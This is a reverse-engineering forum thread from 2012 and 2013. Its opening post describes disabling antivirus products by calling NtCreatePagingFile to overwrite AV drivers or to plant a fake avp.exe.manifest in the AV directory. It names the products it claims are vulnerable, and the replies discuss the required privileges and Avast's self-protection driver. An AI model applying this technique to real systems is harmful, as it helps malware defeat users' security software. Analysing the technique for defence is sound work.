A forum for reverse engineering, OS internals and malware analysis 

Forum for announcements and questions about tools and software.
 #16327  by 0x16/7ton
 Sun Oct 28, 2012 3:47 am
Hello Kernelmode :)
In this post I'll show you how to block the work of AV software, and example of the victim would be of course kaspersky :lol:
After some Research, in smss.exe I came across at the function NtCreatePagingFile.
The definition of which is as follows:
Code: Select all
NTSTATUS NtCreatePagingFile ( IN PUNICODE_STRING PageFileName, IN PLARGE_INTEGER InitialSize, IN PLARGE_INTEGER MaximumSize, IN ULONG Reserved );
It's not a secret that smss.exe uses this feature to create a swap files in the startup process OS windows.
Session manager takes the parameters for this api from registry key:
\Registry\Machine\System\CurrentControlSetControl\Session Manager\Memory
PagingFiles - path to page files with initial and maximum size

In general the idea to use the swap file creation for our needs.
Using NtCreatePagingFile with PageFileName parameter equal, for example, path to drivers AV.
The result of this experiment was successful rewriting drivers av,by a swap file.
Further attempts were made swapped main dll of kaspesky,but alas NtCreatePagingFile returned STATUS_SHARING_VIOLATION.
After that, I came up with another idea to create a swap file of this type:
C:\%path_to_kaspersky_dir%\avp.exe.manifest
That is, we create a fake manifest file,in resulting after reboot Kaspersky could not run any gui or service process :twisted:
Limitations,notes:
  • -NtCreatePagingFile check in start current value of pagefiles (MmNumberOfPagingFiles) with hardcoded value in function body and return STATUS_TOO_MANY_PAGING_FILES if it equall(on my windows xp it 16)
    -We need SeCreatePagefilePrivilege for use function NtCreatePagingFile
    -Of course locking AV software would be work after reboot
    -NtCreatePagingFile extend pagefile maximum on current launched system,but after reboot our created file not be a paged.And here funny moment,if we create manifest
    file in av directory,we could not delete him after reboot,because av protect their files :)
The list of av which was tested with this method:
Vulnerable:
  • Kaspersky
    Eset
    Avast
    McAfee
    AVG
    ZoneAlarm
Not vulnerable:
  • panda 2013
    DrWeb
Here link to video working PoC:
http://www.sendspace.com/file/oyhly7

It would be cool if your test with another av this method :)
thx for reading ^_^ and very thanks EP_X0FF for help me.
 #16811  by EP_X0FF
 Sat Nov 24, 2012 1:33 pm
 #18421  by r3shl4k1sh
 Tue Mar 05, 2013 10:56 am
Don't you need more than Admin privileg in order to write into the AV folder ?
AFAIK avast (at least) don't let you write inside that directory.
 #18454  by 0x16/7ton
 Wed Mar 06, 2013 9:07 pm
Just hate when people discuss without any facts shown.
Last version Avast 8.0.1482 still vulnerable with this trick:
http://www.sendspace.com/file/ixk9eh
You question it is total offtop,all what you need in first post.
 #18465  by r3shl4k1sh
 Thu Mar 07, 2013 12:58 pm
0x16/7ton wrote: You question it is total offtop,all what you need in first post.
Probably you should read English with more patience..., I didn't asked about your ability to make this trick works against Avast.
My question was if you have to have special privileges in order to write a file in the avast directory or you can do it with any user ?
 #18466  by EP_X0FF
 Thu Mar 07, 2013 2:25 pm
r3shl4k1sh wrote:
0x16/7ton wrote: You question it is total offtop,all what you need in first post.
Probably you should read English with more patience..., I didn't asked about your ability to make this trick works against Avast.
My question was if you have to have special privileges in order to write a file in the avast directory or you can do it with any user ?
You mean, do Avast control it own directory as part a of self protection? If you saw demo, he is using Windows XP and running poc from default account with admin rights. On later OS versions in any case you need elevate your rights (if you are not did this already) to write to %ProgramFiles%.
 #18467  by 0x16/7ton
 Thu Mar 07, 2013 2:57 pm
r3shl4k1sh wrote:
0x16/7ton wrote: You question it is total offtop,all what you need in first post.
Probably you should read English with more patience..., I didn't asked about your ability to make this trick works against Avast.
My question was if you have to have special privileges in order to write a file in the avast directory or you can do it with any user ?
Are you kidding me?Maybe you should write more correct?How i can understand this:
r3shl4k1sh wrote: AFAIK avast (at least) don't let you write inside that directory.
And yes you need admin rights,because by default in Windows administrators accounts exist NtCreatePagingFile privilege.
 #18468  by r3shl4k1sh
 Thu Mar 07, 2013 3:15 pm
EP_X0FF wrote: You mean, do Avast control it own directory as part a of self protection? If you saw demo, he is using Windows XP and running poc from default account with admin rights. On later OS versions in any case you need elevate your rights (if you are not did this already) to write to %ProgramFiles%.
I can't see that he is using the default admin account in both demos.

I have an account which is in the Administrators group and whenever i try to create file in the Avast directory (using explorer) i get an "Access Denied" message.

Maybe it only let you create a file there using the NtCreatePagingFile ?!
 #18470  by EP_X0FF
 Thu Mar 07, 2013 3:46 pm
Avast hooks ntfs driver major handlers by replacing them with own, specifically (at least on 32 bit XP)

IRP_MJ_CREATE
IRP_MJ_CLOSE
IRP_MJ_WRITE
IRP_MJ_SET_INFORMATION
IRP_MJ_CLEANUP

by aswSP.sys (probably SP here stands for SelfProtection). Have no idea why they used this instead of filter.

This used to restrict access to Avast folder and files. However since PoC is working then aswSP allows certain calls (for example NtCreatePagingFile results in IoCreateFile), if it thinks they are from system.
 #19600  by listito
 Tue Jun 11, 2013 7:30 am
Amazing idea 0x16/7ton,

I just tested in winxp sp3 32 bits and works like a charm, but it doesn't in win 7 x64, can someone please explain to me the internals of the idea? why it doesn't run? is it the PEloader that checks .manifest invalid configs and refuses to run the .exe?

Anyone know why it doesn't work in panda and dr web? Iocreatefile hooking?